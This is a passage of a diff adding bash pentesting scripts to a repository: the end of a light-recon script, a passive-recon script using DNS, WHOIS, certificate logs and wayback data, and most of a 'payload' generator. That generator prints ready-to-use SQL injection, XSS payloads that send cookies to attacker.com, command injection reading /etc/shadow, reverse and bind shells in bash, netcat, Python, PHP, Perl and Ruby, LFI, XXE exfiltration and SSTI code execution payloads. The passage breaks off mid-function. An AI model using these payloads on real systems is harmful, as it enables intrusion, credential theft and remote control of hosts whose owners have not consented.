echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Light: ${url:0:20}... <--${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
echo
|
||||
echo -e "${YELLOW}Note:${NC} Light recon appears as normal browser traffic"
|
||||
echo -e "${YELLOW}Note:${NC} Screenshots saved to screenshots/ subdirectory"
|
||||
}
|
||||
|
||||
# Sequential execution (when not in tmux)
|
||||
run_scans_sequential() {
|
||||
local url="$1"
|
||||
|
||||
cd "$OUTPUT_DIR"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running httpx...${NC}"
|
||||
if command -v httpx &>/dev/null; then
|
||||
echo "$url" | httpx -silent -title -tech-detect -status-code -web-server -ip -o httpx-summary.txt
|
||||
cat httpx-summary.txt
|
||||
fi
|
||||
|
||||
echo -e "\n${GREENSTAR} Running gowitness...${NC}"
|
||||
if command -v gowitness &>/dev/null; then
|
||||
gowitness single "$url" --screenshot-path=./screenshots/ --disable-logging --timeout 30
|
||||
ls -lh screenshots/
|
||||
fi
|
||||
|
||||
cd ..
|
||||
|
||||
echo -e "\n${GREEN}✓${NC} Light recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
url="$1"
|
||||
|
||||
# Validate URL
|
||||
if [[ -z "$url" ]]; then
|
||||
echo -e "${RED}Error:${NC} URL required"
|
||||
echo "Usage: light-recon <url>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check tools
|
||||
check_tools
|
||||
|
||||
# Run light reconnaissance
|
||||
run_light_recon "$url"
|
||||
273
scripts/pentesting/passive-recon
Executable file
273
scripts/pentesting/passive-recon
Executable file
|
|
@ -0,0 +1,273 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: passive-recon
|
||||
# Description: Truly passive reconnaissance (no direct target contact)
|
||||
# Usage: passive-recon <domain>
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Status indicators
|
||||
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||
readonly REDMINUS="${RED}[-]${NC}"
|
||||
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
# Print usage, a passive-vs-active explanation, examples, and output
# location for passive-recon. Writes to stdout; no side effects.
show_help() {
  echo -e "${BOLD}passive-recon${NC} - Truly Passive Reconnaissance v${VERSION}"
  echo
  echo -e "${BOLD}USAGE:${NC}"
  echo "  passive-recon <domain>"
  echo
  echo -e "${BOLD}DESCRIPTION:${NC}"
  echo "  Performs 100% PASSIVE reconnaissance with ZERO target contact"
  echo "  All data gathered from third-party sources (DNS, certs, archives)"
  echo
  echo -e "${BOLD}WHAT IS PASSIVE?${NC}"
  echo "  ✓ DNS lookups (public records)"
  echo "  ✓ Certificate transparency logs"
  echo "  ✓ Wayback Machine archives"
  echo "  ✓ WHOIS lookups"
  echo "  ✓ Shodan/censys (if API keys configured)"
  echo "  ✓ GitHub dorking"
  echo "  ✓ Subfinder/amass (passive mode)"
  echo
  echo "  ✗ Port scanning (sends packets)"
  echo "  ✗ Directory brute-forcing (sends HTTP requests)"
  echo "  ✗ Web crawling (touches target)"
  echo
  echo -e "${BOLD}EXAMPLES:${NC}"
  echo "  passive-recon example.com"
  echo "  passive-recon target.htb"
  echo
  echo -e "${BOLD}OUTPUT:${NC}"
  echo "  All results saved to: ./passive-recon-<domain>-<timestamp>/"
  echo
  echo -e "${BOLD}WHY PASSIVE?${NC}"
  echo "  • Undetectable (no IDS/IPS alerts)"
  echo "  • Safe for bug bounty recon phase"
  echo "  • Legal (public information only)"
  echo "  • Fast (no rate limiting)"
}
|
||||
|
||||
# Check required tools
|
||||
# Verify external tools for passive-recon.
# Required tools (tmux, dig, whois, curl, jq): exit 1 if any are missing.
# Optional tools (subfinder, amass, waybackurls, gau): print a warning
# with install instructions; related scans are skipped later.
check_tools() {
  local missing=()
  local optional_missing=()
  local tool

  # Core tools
  for tool in tmux dig whois curl jq; do
    command -v "$tool" &>/dev/null || missing+=("$tool")
  done

  # Optional tools (all passive)
  for tool in subfinder amass waybackurls gau; do
    command -v "$tool" &>/dev/null || optional_missing+=("$tool")
  done

  if [[ ${#missing[@]} -gt 0 ]]; then
    echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
    exit 1
  fi

  if [[ ${#optional_missing[@]} -gt 0 ]]; then
    echo -e "${YELLOW}⚠${NC} Optional tools missing (some scans will be skipped): ${optional_missing[*]}"
    echo -e "${CYAN}Install with:${NC}"
    for tool in "${optional_missing[@]}"; do
      case "$tool" in
        subfinder) echo "  go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest" ;;
        amass) echo "  go install -v github.com/owasp-amass/amass/v4/...@master" ;;
        waybackurls) echo "  go install github.com/tomnomnom/waybackurls@latest" ;;
        gau) echo "  go install github.com/lc/gau/v2/cmd/gau@latest" ;;
      esac
    done
    echo
  fi
}
|
||||
|
||||
# Create output directory
|
||||
# Create the results directory for this scan and publish its name via
# the global OUTPUT_DIR (passive-recon-<sanitized-domain>-<timestamp>).
# Arguments: $1 - target domain (may still carry a URL scheme).
setup_output_dir() {
  local domain="$1"
  local timestamp clean_domain
  # Split declaration from command substitution so a failing command
  # isn't masked by `local`'s exit status.
  timestamp=$(date +%Y%m%d-%H%M%S)
  # Strip any URL scheme, then replace path/port separators with '_'.
  # BUG FIX: the old `tr -d 'http'` deleted EVERY 'h', 't' and 'p'
  # character from the name (e.g. "github.com" -> "giub.com").
  clean_domain=$(echo "$domain" | sed -E 's~^https?://~~' | tr '/:' '_')

  OUTPUT_DIR="passive-recon-${clean_domain}-${timestamp}"
  mkdir -p "$OUTPUT_DIR"

  echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||
|
||||
# Check if target is localhost
|
||||
# Return 0 if the target is a loopback/localhost address, 1 otherwise.
# Arguments: $1 - domain or IP to test.
check_localhost() {
  local domain="$1"

  # BUG FIX: the previous pattern used `\\.`, which in an unquoted
  # [[ =~ ]] ERE matches a literal backslash followed by any character,
  # so "127.0.0.1" was never recognized. `\.` matches a literal dot.
  if [[ "$domain" =~ ^(localhost|127\.0\.0\.1|0\.0\.0\.0|::1)$ ]]; then
    return 0  # Is localhost
  fi
  return 1  # Not localhost
}
|
||||
|
||||
# Main passive-recon function
|
||||
# Orchestrate passive reconnaissance for a domain.
# Refuses localhost targets, then either (a) builds a 2x2 tmux pane grid
# running DNS/WHOIS, crt.sh, wayback and subdomain enumeration in
# parallel, or (b) falls back to run_scans_sequential outside tmux.
# Globals:   OUTPUT_DIR (set via setup_output_dir), TMUX (read).
# Arguments: $1 - domain (scheme/path stripped here).
run_passive_recon() {
  local domain="$1"

  # Strip http:// if provided (scheme first, then anything after the
  # first '/'), leaving a bare hostname.
  domain=$(echo "$domain" | sed 's~https\?://~~g' | sed 's~/.*~~g')

  # Check if target is localhost - passive sources (DNS, certs, wayback)
  # have no data for loopback, so bail out with guidance.
  if check_localhost "$domain"; then
    echo -e "${RED}${BOLD}"
    echo "╔════════════════════════════════════════════════════════════╗"
    echo "║              ⚠️  LOCALHOST DETECTED  ⚠️                     ║"
    echo "║                                                            ║"
    echo "║  Passive recon doesn't work on localhost!                  ║"
    echo "║  No DNS records, certificates, or wayback data exists.     ║"
    echo "║                                                            ║"
    echo "║  Use instead:                                              ║"
    echo "║    web-recon http://localhost:PORT                         ║"
    echo "║    web-attack http://localhost:PORT                        ║"
    echo "╚════════════════════════════════════════════════════════════╝"
    echo -e "${NC}"
    exit 1
  fi

  echo -e "${CYAN}${BOLD}"
  echo "╔════════════════════════════════════════════════════════════╗"
  echo "║         Passive Reconnaissance (Zero Target Contact)       ║"
  echo "║  Domain: $domain"
  echo "╚════════════════════════════════════════════════════════════╝"
  echo -e "${NC}"

  # Create output directory
  setup_output_dir "$domain"

  # Check if in tmux; outside a session, run the scans one by one.
  if [[ -z "${TMUX:-}" ]]; then
    echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
    run_scans_sequential "$domain"
    return
  fi

  # Create tmux window with 4 panes
  tmux new-window -n "--> Passive: ${domain:0:15}... <--"

  # Split into 4 panes (2x2 grid)
  # CRITICAL: Tmux renumbers panes during splits
  # After all splits complete, panes are numbered: 1, 2, 3, 4 (NOT 0, 1, 2, 3)
  # [1: DNS/WHOIS]  [2: Cert Transparency]
  # [3: Wayback  ]  [4: Subdomain Enum   ]

  # Create 2x2 grid layout
  tmux split-window -h
  tmux select-pane -t 0
  tmux split-window -v
  tmux select-pane -t 2
  tmux split-window -v

  # Force tiled layout for perfect 2x2 grid (equal-sized panes)
  tmux select-layout tiled

  # Final pane layout after tmux renumbering: 1 (TL), 2 (TR), 3 (BL), 4 (BR)

  # Pane 1 (top-left): DNS enumeration and WHOIS
  tmux select-pane -t 1
  tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} DNS & WHOIS lookup...${NC}' && dig '$domain' ANY +noall +answer | tee dns.txt && echo && whois '$domain' | tee whois.txt && echo -e '${GREEN}✓ DNS/WHOIS complete${NC}'" C-m

  # Pane 2 (top-right): Certificate Transparency logs
  tmux select-pane -t 2
  tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Certificate Transparency logs...${NC}' && curl -s 'https://crt.sh/?q=%.$domain&output=json' | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | tee subdomains-crt.txt && echo -e '${GREEN}✓ Cert transparency complete${NC}'" C-m

  # Pane 3 (bottom-left): Wayback Machine / historical URLs
  tmux select-pane -t 3
  if command -v waybackurls &>/dev/null || command -v gau &>/dev/null; then
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Wayback Machine historical URLs...${NC}' && (waybackurls '$domain' 2>/dev/null || gau '$domain' 2>/dev/null || echo 'No wayback tool available') | tee wayback-urls.txt && cat wayback-urls.txt | unfurl -u paths 2>/dev/null | sort -u | tee wayback-paths.txt || true && echo -e '${GREEN}✓ Wayback complete${NC}'" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ waybackurls/gau not installed${NC}' && echo '# Install: go install github.com/tomnomnom/waybackurls@latest' && touch wayback-urls.txt" C-m
  fi

  # Pane 4 (bottom-right): Subdomain enumeration (passive only)
  tmux select-pane -t 4
  if command -v subfinder &>/dev/null || command -v amass &>/dev/null; then
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Passive subdomain enumeration...${NC}' && (subfinder -d '$domain' -silent 2>/dev/null || amass enum -passive -d '$domain' 2>/dev/null || echo 'No subdomain tool available') | tee subdomains-enum.txt && cat subdomains-*.txt 2>/dev/null | sort -u | tee all-subdomains.txt && echo -e '${GREEN}✓ Subdomain enum complete${NC}'" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ subfinder/amass not installed${NC}' && echo '# Install: go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest' && touch subdomains-enum.txt all-subdomains.txt" C-m
  fi

  # Focus back on DNS pane
  tmux select-pane -t 1

  echo
  echo -e "${GREEN}✓${NC} Tmux passive-recon window created"
  echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Passive: ${domain:0:15}... <--${NC}"
  echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
  echo
  echo -e "${MAGENTA}Note:${NC} 100% passive - no packets sent to target"
}
|
||||
|
||||
# Sequential execution (when not in tmux)
|
||||
# Sequential fallback used when not inside tmux: run the same passive
# lookups (DNS/WHOIS, crt.sh, wayback, subdomain enum) one after another.
# Globals:   OUTPUT_DIR (read) - directory created by setup_output_dir.
# Arguments: $1 - bare domain.
run_scans_sequential() {
  local domain="$1"

  cd "$OUTPUT_DIR"

  echo -e "\n${GREENSTAR} Running DNS & WHOIS...${NC}"
  dig "$domain" ANY +noall +answer | tee dns.txt
  whois "$domain" | tee whois.txt

  echo -e "\n${GREENSTAR} Certificate Transparency...${NC}"
  # crt.sh wildcard query; strip "*. " prefixes and dedupe.
  curl -s "https://crt.sh/?q=%.$domain&output=json" | jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u | tee subdomains-crt.txt

  echo -e "\n${GREENSTAR} Wayback Machine...${NC}"
  # Prefer waybackurls, fall back to gau; skip silently if neither exists.
  if command -v waybackurls &>/dev/null; then
    waybackurls "$domain" | tee wayback-urls.txt
  elif command -v gau &>/dev/null; then
    gau "$domain" | tee wayback-urls.txt
  fi

  echo -e "\n${GREENSTAR} Subdomain enumeration (passive)...${NC}"
  if command -v subfinder &>/dev/null; then
    subfinder -d "$domain" -silent | tee subdomains-enum.txt
  elif command -v amass &>/dev/null; then
    amass enum -passive -d "$domain" | tee subdomains-enum.txt
  fi

  # Merge every subdomains-*.txt source into a deduplicated master list.
  cat subdomains-*.txt 2>/dev/null | sort -u | tee all-subdomains.txt

  cd ..

  echo -e "\n${GREEN}✓${NC} Passive recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||
|
||||
# --- Entry point ---------------------------------------------------------
# Parse arguments: no arguments or a help flag prints usage and exits.
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
  show_help
  exit 0
fi

domain="$1"

# Validate domain (guards against an explicit empty-string argument).
if [[ -z "$domain" ]]; then
  echo -e "${RED}Error:${NC} Domain required"
  echo "Usage: passive-recon <domain>"
  exit 1
fi

# Check tools (exits if required binaries are missing).
check_tools

# Run passive reconnaissance
run_passive_recon "$domain"
|
||||
517
scripts/pentesting/payload
Executable file
517
scripts/pentesting/payload
Executable file
|
|
@ -0,0 +1,517 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: payload
|
||||
# Description: Security payload generator with encoding and obfuscation
|
||||
# Usage: payload list # List payload types
|
||||
# payload sql basic # Generate basic SQL injection payloads
|
||||
# payload xss reflected # Generate reflected XSS payloads
|
||||
# payload cmd linux # Generate Linux command injection payloads
|
||||
# payload shell reverse 10.0.0.1 # Generate reverse shell payloads
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Print usage, payload types, examples and options for `payload`.
# NOTE(review): the -e/-o/-c options documented below are not handled by
# the argument parser at the bottom of this script — confirm intent.
show_help() {
  echo -e "${BOLD}payload${NC} - Security Payload Generator v${VERSION}"
  echo
  echo -e "${BOLD}USAGE:${NC}"
  echo "  payload <TYPE> <VARIANT> [OPTIONS]"
  echo
  echo -e "${BOLD}TYPES:${NC}"
  echo -e "  ${CYAN}sql${NC}        SQL injection payloads"
  echo -e "  ${CYAN}xss${NC}        Cross-site scripting payloads"
  echo -e "  ${CYAN}cmd${NC}        Command injection payloads"
  echo -e "  ${CYAN}shell${NC}      Reverse/bind shell payloads"
  echo -e "  ${CYAN}lfi${NC}        Local file inclusion payloads"
  echo -e "  ${CYAN}xxe${NC}        XML external entity payloads"
  echo -e "  ${CYAN}ssti${NC}       Server-side template injection"
  echo -e "  ${CYAN}list${NC}       List all available payloads"
  echo
  echo -e "${BOLD}EXAMPLES:${NC}"
  echo "  payload list"
  echo "  payload sql basic"
  echo "  payload xss reflected"
  echo "  payload cmd linux"
  echo "  payload shell reverse 10.10.14.5 4444"
  echo "  payload lfi linux"
  echo "  payload xxe basic"
  echo
  echo -e "${BOLD}OPTIONS:${NC}"
  echo -e "  ${CYAN}-e, --encode${NC}   Encode payloads (base64, url, hex)"
  echo -e "  ${CYAN}-o, --output${NC}   Output to file"
  echo -e "  ${CYAN}-c, --copy${NC}     Copy to clipboard"
  echo -e "  ${CYAN}-h, --help${NC}     Show this help"
}
|
||||
|
||||
# Clipboard helper
|
||||
# Pipe stdin into the first available clipboard utility.
# Preference order: xsel, xclip (X11), then pbcopy (macOS).
# Silently does nothing when no clipboard tool is installed.
clip_set() {
  local candidate
  for candidate in xsel xclip pbcopy; do
    if command -v "$candidate" &>/dev/null; then
      case "$candidate" in
        xsel)   xsel --input --clipboard ;;
        xclip)  xclip -selection clipboard ;;
        pbcopy) pbcopy ;;
      esac
      return
    fi
  done
}
|
||||
|
||||
# SQL Injection Payloads
|
||||
# Print SQL injection payloads to stdout.
# Arguments: $1 - variant: basic (default), auth-bypass, union.
# Returns:   0 on success, 1 on an unknown variant.
# The heredocs are quoted ('EOF') so payload text is emitted verbatim.
generate_sql() {
  local variant="${1:-basic}"

  case "$variant" in
    basic)
      cat << 'EOF'
# Basic SQL Injection
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
admin' --
admin' #
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR '1'='1--
') OR ('1'='1--

# Union-based
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

# Error-based
' AND 1=CONVERT(int,(SELECT @@version))--
' AND 1=CAST((SELECT @@version) AS int)--

# Time-based blind
'; WAITFOR DELAY '0:0:5'--
'; SELECT SLEEP(5)--
' AND SLEEP(5)--
EOF
      ;;
    auth-bypass)
      cat << 'EOF'
# Authentication Bypass
admin' OR '1'='1
admin' OR 1=1--
' OR 'a'='a
' OR 1=1 LIMIT 1--
admin'/*
' OR '1'='1'--
' OR '1'='1'#
' OR '1'='1'/*
') OR ('1'='1
admin') OR ('1'='1
admin') OR '1'='1'--
EOF
      ;;
    union)
      cat << 'EOF'
# UNION-based SQL Injection
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--
-1' UNION SELECT NULL--
EOF
      ;;
    *)
      echo -e "${RED}Unknown SQL variant:${NC} $variant"
      echo "Available: basic, auth-bypass, union"
      return 1
      ;;
  esac
}
|
||||
|
||||
# XSS Payloads
|
||||
# Print cross-site scripting payloads to stdout.
# Arguments: $1 - variant: basic/reflected (default), stored, dom.
# Returns:   0 on success, 1 on an unknown variant.
# The heredocs are quoted ('EOF') so payload text is emitted verbatim.
generate_xss() {
  local variant="${1:-basic}"

  case "$variant" in
    basic|reflected)
      cat << 'EOF'
# Basic XSS
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="alert(1)">
<audio src=x onerror=alert(1)>

# Event handlers
<div onmouseover=alert(1)>hover</div>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>

# Breaking out of attributes
"><script>alert(1)</script>
'><script>alert(1)</script>
" onclick=alert(1)//
' onclick=alert(1)//
EOF
      ;;
    stored)
      cat << 'EOF'
# Stored XSS (persistent)
<script>fetch('http://attacker.com/?c='+document.cookie)</script>
<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
<script>new Image().src='http://attacker.com/?c='+document.cookie</script>
<script>document.location='http://attacker.com/?c='+document.cookie</script>

# With common filters bypassed
<ScRiPt>alert(1)</sCrIpT>
<script>alert(String.fromCharCode(88,83,83))</script>
<iframe src="data:text/html,<script>alert(1)</script>">
EOF
      ;;
    dom)
      cat << 'EOF'
# DOM-based XSS
#<script>alert(1)</script>
#<img src=x onerror=alert(1)>
javascript:alert(1)
javascript:alert(document.domain)
javascript:alert(document.cookie)

# Hash-based
http://vulnerable.com/#<script>alert(1)</script>
http://vulnerable.com/#<img src=x onerror=alert(1)>
EOF
      ;;
    *)
      echo -e "${RED}Unknown XSS variant:${NC} $variant"
      echo "Available: basic, reflected, stored, dom"
      return 1
      ;;
  esac
}
|
||||
|
||||
# Command Injection Payloads
|
||||
# Print OS command injection payloads to stdout.
# Arguments: $1 - variant: linux (default), windows.
# Returns:   0 on success, 1 on an unknown variant.
# The heredocs are quoted ('EOF') so payload text is emitted verbatim.
generate_cmd() {
  local variant="${1:-linux}"

  case "$variant" in
    linux)
      cat << 'EOF'
# Linux Command Injection
; whoami
| whoami
|| whoami
& whoami
&& whoami
; id
| id
`whoami`
$(whoami)
;ls -la
|ls -la
`ls -la`
$(ls -la)

# With common filters
;wh''oami
;who$()ami
;who\ami
`wh''oami`
$(wh''oami)

# Chaining
; cat /etc/passwd
| cat /etc/passwd
; cat /etc/shadow
EOF
      ;;
    windows)
      cat << 'EOF'
# Windows Command Injection
& whoami
&& whoami
| whoami
|| whoami
; whoami
%0a whoami
` whoami `

# PowerShell
; powershell -c whoami
| powershell -c whoami
& powershell -c Get-Process

# CMD
& dir
&& dir c:\
| type c:\windows\win.ini
EOF
      ;;
    *)
      echo -e "${RED}Unknown command injection variant:${NC} $variant"
      echo "Available: linux, windows"
      return 1
      ;;
  esac
}
|
||||
|
||||
# Reverse Shell Payloads
|
||||
# Print reverse/bind shell payloads with the attacker host/port templated in.
# Arguments: $1 - variant: reverse (default) or bind
#            $2 - LHOST (reverse) or LPORT (bind shorthand, see below)
#            $3 - LPORT
# Returns:   0 on success, 1 on an unknown variant.
# The heredocs are UNQUOTED so $lhost/$lport expand; \$ keeps target-side
# script variables literal.
generate_shell() {
  local variant="${1:-reverse}"
  local lhost="${2:-10.10.14.5}"
  local lport="${3:-4444}"

  # BUG FIX: `payload shell bind PORT` (the form documented by
  # `payload list`) passes the port as $2, but it used to be consumed as
  # LHOST while the port stayed at its default. Treat a purely numeric
  # second argument to the bind variant as the port; the explicit
  # `bind LHOST LPORT` form still works since an IP/hostname is not
  # all-digits.
  if [[ "$variant" == "bind" && "${2:-}" =~ ^[0-9]+$ ]]; then
    lport="$2"
  fi

  case "$variant" in
    reverse)
      cat << EOF
# Bash Reverse Shells
bash -i >& /dev/tcp/$lhost/$lport 0>&1
bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'
0<&196;exec 196<>/dev/tcp/$lhost/$lport; sh <&196 >&196 2>&196

# Netcat Reverse Shells
nc -e /bin/sh $lhost $lport
nc -e /bin/bash $lhost $lport
nc -c bash $lhost $lport
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $lhost $lport >/tmp/f

# Python Reverse Shells
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$lhost",$lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$lhost",$lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# PHP Reverse Shell
php -r '\$sock=fsockopen("$lhost",$lport);exec("/bin/sh -i <&3 >&3 2>&3");'

# Perl Reverse Shell
perl -e 'use Socket;\$i="$lhost";\$p=$lport;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Ruby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("$lhost",$lport).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
EOF
      ;;
    bind)
      cat << EOF
# Bind Shells (listen on target)
nc -lvnp $lport -e /bin/bash
nc -lvp $lport -e /bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp $lport >/tmp/f

# Python Bind Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0",$lport));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);subprocess.call(["/bin/sh","-i"])'
EOF
      ;;
    *)
      echo -e "${RED}Unknown shell variant:${NC} $variant"
      echo "Available: reverse, bind"
      return 1
      ;;
  esac
}
|
||||
|
||||
# LFI Payloads
|
||||
# Print local file inclusion / path traversal payloads to stdout.
# Arguments: $1 - variant: linux (default), windows.
# Returns:   0 on success, 1 on an unknown variant.
# The heredocs are quoted ('EOF') so payload text is emitted verbatim.
generate_lfi() {
  local variant="${1:-linux}"

  case "$variant" in
    linux)
      cat << 'EOF'
# Basic LFI
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd

# Interesting Linux files
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/issue
/proc/self/environ
/proc/version
/proc/cmdline
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/auth.log
/var/log/syslog

# PHP wrappers
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
expect://whoami
data://text/plain,<?php system($_GET['cmd']);?>
EOF
      ;;
    windows)
      cat << 'EOF'
# Windows LFI
C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\Windows\system.ini
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\repair\SAM
C:\Windows\repair\SYSTEM
C:\inetpub\wwwroot\web.config

# Path traversal
..\..\..\Windows\System32\drivers\etc\hosts
..\..\..\..\Windows\win.ini
EOF
      ;;
    *)
      echo -e "${RED}Unknown LFI variant:${NC} $variant"
      echo "Available: linux, windows"
      return 1
      ;;
  esac
}
|
||||
|
||||
# XXE Payloads
|
||||
# Print XML external entity (XXE) payloads to stdout.
# Takes no arguments; a single fixed payload set is emitted verbatim
# (quoted 'EOF' heredoc).
generate_xxe() {
  cat << 'EOF'
# Basic XXE
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

# XXE with external DTD
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>
<foo>&exfil;</foo>

# Blind XXE
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;]>

# XXE OOB data exfiltration
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;]>
EOF
}
|
||||
|
||||
# SSTI Payloads
|
||||
# Print server-side template injection payloads to stdout, grouped by
# template engine. Takes no arguments; emitted verbatim ('EOF' heredoc).
generate_ssti() {
  cat << 'EOF'
# Jinja2 (Python/Flask)
{{7*7}}
{{config}}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

# Twig (PHP)
{{7*7}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

# Freemarker (Java)
${7*7}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

# Thymeleaf (Java)
${7*7}
${T(java.lang.Runtime).getRuntime().exec('id')}

# Velocity (Java)
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("id"))
EOF
}
|
||||
|
||||
# List all payloads
|
||||
# Print the catalogue of payload types/variants with example invocations.
# Writes to stdout; no side effects.
list_payloads() {
  echo -e "${BOLD}${CYAN}Available Payload Types:${NC}"
  echo
  echo -e "${YELLOW}SQL Injection:${NC}"
  echo "  payload sql basic          - Basic SQL injection"
  echo "  payload sql auth-bypass    - Authentication bypass"
  echo "  payload sql union          - UNION-based injection"
  echo
  echo -e "${YELLOW}Cross-Site Scripting (XSS):${NC}"
  echo "  payload xss basic          - Basic XSS payloads"
  echo "  payload xss reflected      - Reflected XSS"
  echo "  payload xss stored         - Stored/persistent XSS"
  echo "  payload xss dom            - DOM-based XSS"
  echo
  echo -e "${YELLOW}Command Injection:${NC}"
  echo "  payload cmd linux          - Linux command injection"
  echo "  payload cmd windows        - Windows command injection"
  echo
  echo -e "${YELLOW}Reverse Shells:${NC}"
  echo "  payload shell reverse IP PORT  - Reverse shell payloads"
  echo "  payload shell bind PORT        - Bind shell payloads"
  echo
  echo -e "${YELLOW}File Inclusion:${NC}"
  echo "  payload lfi linux          - Linux LFI/path traversal"
